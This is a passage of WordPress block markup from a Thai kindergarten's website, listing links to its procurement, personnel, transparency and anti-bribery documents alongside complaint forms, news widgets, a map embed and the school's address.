data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline 